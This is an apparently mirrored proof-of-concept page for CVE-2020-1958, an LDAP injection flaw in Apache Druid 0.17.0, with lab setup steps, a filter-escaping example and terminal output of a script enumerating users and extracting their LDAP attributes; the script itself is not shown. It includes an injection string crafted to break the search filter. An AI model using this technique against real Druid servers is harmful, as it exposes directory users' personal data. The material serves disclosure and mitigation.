
POC details: 9f1ac3042d3fb87d0fe217872815e1171c8c9c01

Source
Related vulnerability
Title: Apache Druid injection vulnerability (CVE-2020-1958)
Description: Apache Druid is a column-oriented, open-source distributed database written in Java by the Apache Software Foundation in the United States. Apache Druid 0.17.0 contains an injection vulnerability. The vulnerability stems from configuration and similar errors present while the network system or product is running. An unauthorized attacker can exploit it to obtain sensitive information from the affected component.
Description
CVE-2020-1958 PoC
Introduction
# CVE-2020-1958 PoC

CVE-2020-1958 is a high-severity LDAP injection vulnerability in [Apache Druid](https://druid.apache.org/) 0.17.0. It allows an attacker to bypass the LDAP search filter and retrieve any LDAP attribute values of users that exist on the LDAP server.

From official Apache Druid [advisory](https://seclists.org/oss-sec/2020/q2/5):

> When LDAP authentication is enabled:
> - Callers of Druid APIs with a valid set of LDAP credentials can bypass the `credentialsValidator.userSearch` filter barrier that determines if a valid LDAP user is allowed to authenticate with Druid. They are still subject to role-based authorization checks, if configured.
> - Callers of Druid APIs can retrieve any LDAP attribute values of users that exist on the LDAP server, so long as that information is visible to the Druid server. This information disclosure does not require the caller itself to be a valid LDAP user.

## PoC

The [poc.py](poc.py) script demonstrates how an unauthorized attacker can enumerate users on an LDAP server integrated with Druid and fetch the value of any attribute of any user.

### Local Druid test server

Skip this step if you already have a Druid server with enabled LDAP authentication.

1. Download Druid 0.17.0 and extract it

   ```shell
   $ wget https://archive.apache.org/dist/druid/0.17.0/apache-druid-0.17.0-bin.tar.gz
   $ tar -zxf apache-druid-0.17.0-bin.tar.gz
   ```

2. Enable and configure LDAP authentication in `conf/druid/single-server/nano-quickstart/_common/common.runtime.properties`

   * Enable `druid-basic-security` extension

     Locate `druid.extensions.loadList` and add `druid-basic-security`:

     ```properties
     druid.extensions.loadList=["druid-hdfs-storage", "druid-kafka-indexing-service", "druid-datasketches", "druid-basic-security"]
     ```
  
   * Configure LDAP authentication

     Add the following at the end of the file:

     ```properties
     druid.auth.authenticatorChain=["ldap"]

     druid.auth.authenticator.ldap.type=basic
     druid.auth.authenticator.ldap.initialAdminPassword=password
     druid.auth.authenticator.ldap.initialInternalClientPassword=password
     druid.auth.authenticator.ldap.credentialsValidator.type=ldap
     druid.auth.authenticator.ldap.credentialsValidator.url=ldap://127.0.0.1:2389
     druid.auth.authenticator.ldap.credentialsValidator.bindUser=cn=admin,dc=example,dc=org
     druid.auth.authenticator.ldap.credentialsValidator.bindPassword=admin
     druid.auth.authenticator.ldap.credentialsValidator.baseDn=dc=example,dc=org
     druid.auth.authenticator.ldap.credentialsValidator.userSearch=(&(uid=%s)(memberof=cn=users,dc=example,dc=org))
     druid.auth.authenticator.ldap.credentialsValidator.userAttribute=uid
     druid.auth.authenticator.ldap.authorizerName=MyAuthorizer

     druid.escalator.type=basic
     druid.escalator.internalClientUsername=user1
     druid.escalator.internalClientPassword=user1
     druid.escalator.authorizerName=MyAuthorizer

     druid.auth.authorizers=["MyAuthorizer"]
     druid.auth.authorizer.MyAuthorizer.type=basic
     druid.auth.authorizer.MyAuthorizer.initialAdminUser=user1
     druid.auth.authorizer.MyAuthorizer.initialAdminRole=admin
     druid.auth.authorizer.MyAuthorizer.roleProvider.type=ldap
     ```

3. Run OpenLDAP server

   ```shell
   $ docker run -p 2389:389 --name my-openldap-container osixia/openldap:1.3.0
   ```

4. Import users from [users.ldif](users.ldif) to LDAP

   ```shell
   $ ldapadd -x -D "cn=admin,dc=example,dc=org" -w admin -H ldap://localhost:2389 -f users.ldif
   ```

5. Run Druid server

   ```shell
   $ bin/start-nano-quickstart
   ```
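The root cause the advisory describes is the `%s` in the `credentialsValidator.userSearch` template above being filled with the caller-supplied username without escaping. As an added example, not code from the PoC repository or from Druid, the snippet below builds that same template both ways, plain substitution versus RFC 4515 escaping, and counts the attribute assertions in the result so the structural difference is visible; the usernames are constructed inputs.

```python
import re

# userSearch template from the Druid configuration above (the %s is where Druid
# inserts the caller-supplied username).
USER_SEARCH = "(&(uid=%s)(memberof=cn=users,dc=example,dc=org))"

# RFC 4515 section 3: characters that must be escaped inside an assertion value.
_ESCAPES = {"\\": r"\5c", "*": r"\2a", "(": r"\28", ")": r"\29", "\x00": r"\00"}


def escape_filter_value(value: str) -> str:
    """Escape a value so it is only ever matched literally, never parsed as filter syntax."""
    return "".join(_ESCAPES.get(ch, ch) for ch in value)


def build_filter_unsafe(username: str) -> str:
    """Plain substitution: the username is parsed as part of the filter (the vulnerable pattern)."""
    return USER_SEARCH % username


def build_filter_safe(username: str) -> str:
    """Substitution after escaping: the username stays a literal value (the mitigation)."""
    return USER_SEARCH % escape_filter_value(username)


def count_assertions(ldap_filter: str) -> int:
    """Number of attribute assertions ('(attr=') in the filter. The template has exactly
    two; any other number means the caller changed the filter's structure."""
    return len(re.findall(r"\(([A-Za-z][\w-]*)=", ldap_filter))


def has_unescaped_wildcard(ldap_filter: str) -> bool:
    """True if a literal '*' survived, i.e. an assertion became a wildcard/substring match."""
    return "*" in ldap_filter


if __name__ == "__main__":
    # Constructed inputs: a normal username and one carrying filter metacharacters.
    for name in ("admin1", "admin*)(cn=*"):
        for label, build in (("unsafe", build_filter_unsafe), ("safe", build_filter_safe)):
            f = build(name)
            print(f"{label:6} {name!r:16} assertions={count_assertions(f)} "
                  f"wildcard={has_unescaped_wildcard(f)}  {f}")
```

For a benign username both builders produce the identical filter, so escaping costs nothing; only the metacharacter input diverges, and the assertion count is a cheap check a validator can apply to the final filter string before sending it to the directory.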

### Enumerate users

[![asciicast](https://asciinema.org/a/enOT26z1Slsee3xEjBw1OL0Aw.svg)](https://asciinema.org/a/enOT26z1Slsee3xEjBw1OL0Aw)

```shell
$ ./poc.py --url http://127.0.0.1:8888/
[INFO] Enumerating users from http://127.0.0.1:8888/
admin1
admin2
admin3
admin4
admin5
admin6
admin7
user1
user2
user3
user4
```

### Retrieve LDAP attributes' values of `admin1` user

[![asciicast](https://asciinema.org/a/eY8vBXftW00dQaYnJOsGO0ZOZ.svg)](https://asciinema.org/a/eY8vBXftW00dQaYnJOsGO0ZOZ)

```shell
$ ./poc.py --url http://127.0.0.1:8888/ --user admin1 --attr mail
[INFO] Exfiltrating mail attribute of admin1 user from http://127.0.0.1:8888/
admin1@example.com
$ ./poc.py --url http://127.0.0.1:8888/ --user admin1 --attr givenName
[INFO] Exfiltrating givenName attribute of admin1 user from http://127.0.0.1:8888/
admin1
$ ./poc.py --url http://127.0.0.1:8888/ --user admin1 --attr sn
[INFO] Exfiltrating sn attribute of admin1 user from http://127.0.0.1:8888/
last
```
File snapshot

```
[4.0K] /data/pocs/9f1ac3042d3fb87d0fe217872815e1171c8c9c01
├── [2.6K] poc.py
├── [4.5K] README.md
└── [3.7K] users.ldif

0 directories, 3 files
```

The Shenlong bot has cached this for you.
Notes
    1. It is recommended to access the PoC through the source first.
    2. If the source is unavailable or cannot be accessed, send an e-mail to f.jinxu#gmail.com to request a local snapshot (replace # with @).
    3. Shenlong has taken a snapshot of the PoC code for you; to support long-term maintenance, please consider paying for or donating to the local PoC. Thank you for your support.